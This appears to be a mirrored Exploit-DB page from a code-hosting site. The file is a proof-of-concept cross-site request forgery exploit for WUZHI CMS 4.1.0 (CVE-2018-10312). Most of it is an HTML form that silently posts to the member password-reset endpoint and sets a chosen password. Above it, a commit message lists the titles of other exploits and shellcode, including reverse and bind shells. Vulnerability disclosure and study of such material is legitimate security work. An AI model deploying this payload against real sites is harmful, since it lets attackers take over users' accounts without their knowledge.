bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44504.txt
Offensive Security c249d94cb7 DB: 2018-04-25 
28 changes to exploits/shellcodes

gif2apng 1.9 - '.gif' Stack Buffer Overflow
VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 - Memory Corruption (PoC)
Kaspersky KSN for Linux 5.2 - Memory Corruption
Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service
Adobe Flash - Overflow when Playing Sound
Adobe Flash - Overflow in Slab Rendering
Adobe Flash - Info Leak in Image Inflation
Adobe Flash - Out-of-Bounds Write in blur Filtering
Chrome V8 JIT - 'NodeProperties::InferReceiverMaps' Type Confusion
R 3.4.4 - Local Buffer Overflow
Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)
lastore-daemon D-Bus - Privilege Escalation (Metasploit)
Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass)
ASUS infosvr - Auth Bypass Command Execution (Metasploit)
UK Cookie Consent - Persistent Cross-Site Scripting
WUZHI CMS 4.1.0 - Cross-Site Request Forgery
Open-AudIT 2.1 - CSV Macro Injection
Monstra CMS 3.0.4 - Arbitrary Folder Deletion
Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass
Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure
WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion
WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting

Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes)
Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode
Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes)
Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)
Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes)
2018-04-25 05:01:39 +00:00

23 lines
No EOL
982 B
Text
Raw Blame History

# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery
# Date: 2018-04-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10312
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132)
There is a csrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset
After the member logged in. open the exp page
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
<input type="hidden" name="password" value="yuduo" />
<input type="hidden" name="password2" value="yuduo" />
<input type="hidden" name="submit" value="ç&#161;&#174;&#32;å&#174;&#154;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink